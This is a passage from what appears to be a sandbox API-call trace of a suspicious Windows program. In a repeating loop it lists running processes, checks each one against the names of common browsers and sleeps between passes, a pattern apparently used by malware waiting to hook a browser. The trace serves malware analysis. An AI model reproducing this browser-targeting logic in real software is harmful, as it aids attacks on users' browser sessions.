lpString2="chrome.exe") returned -1 [0239.170] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0239.170] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0239.170] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0239.170] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0239.170] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0239.170] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0239.170] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.170] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0239.171] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0239.171] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0239.171] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0239.171] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0239.171] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.171] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0239.171] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0239.172] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0239.172] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0239.172] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0239.172] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0239.172] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0239.172] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0239.172] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0239.172] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0239.172] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.172] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0239.173] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0239.173] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0239.173] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0239.173] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0239.173] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0239.173] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0239.173] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0239.173] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0239.173] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0239.173] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.173] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0239.174] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0239.174] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0239.174] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0239.174] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0239.174] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.174] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0239.174] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0239.174] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0239.175] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0239.175] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0239.175] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0239.175] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0239.175] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0239.175] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0239.175] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0239.175] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.175] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0239.176] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0239.176] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0239.176] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0239.176] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0239.176] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0239.176] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0239.176] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0239.176] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0239.176] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0239.176] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.176] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.177] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0239.177] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0239.177] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0239.177] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0239.177] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.177] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.177] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.177] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.177] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.178] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.178] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0239.178] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0239.178] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0239.178] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0239.178] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0239.178] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.178] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0239.179] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0239.179] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0239.179] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0239.179] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0239.179] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0239.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0239.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0239.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0239.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0239.179] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.179] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.180] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.180] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.180] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.180] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0239.180] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.180] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0239.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0239.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0239.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0239.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0239.180] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0239.181] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0239.181] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0239.181] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0239.181] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0239.181] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0239.181] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0239.182] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.182] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0239.183] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0239.183] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0239.184] CloseHandle (hObject=0xe8) returned 1 [0239.184] Sleep (dwMilliseconds=0x3e8) [0240.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0240.190] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0240.190] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0240.190] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0240.190] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0240.190] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0240.190] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0240.190] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0240.191] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0240.191] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0240.191] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0240.191] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0240.191] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0240.191] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0240.192] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0240.192] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0240.192] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0240.192] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0240.192] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.192] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0240.192] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0240.192] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0240.192] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0240.192] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.192] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0240.193] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0240.193] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0240.193] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0240.193] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0240.193] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0240.193] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0240.193] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0240.193] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0240.193] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0240.193] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.193] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0240.194] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0240.194] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0240.194] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0240.194] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0240.194] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.194] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0240.195] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0240.195] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0240.195] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0240.195] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0240.195] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0240.195] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0240.195] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0240.195] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0240.195] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0240.195] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.195] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0240.196] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0240.196] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0240.196] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0240.196] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0240.196] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0240.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.196] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.196] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.196] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.196] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.196] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.196] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.197] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.197] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.197] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.197] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.197] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0240.197] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0240.198] lstrcmpiA (lpString1="svchost.exe", 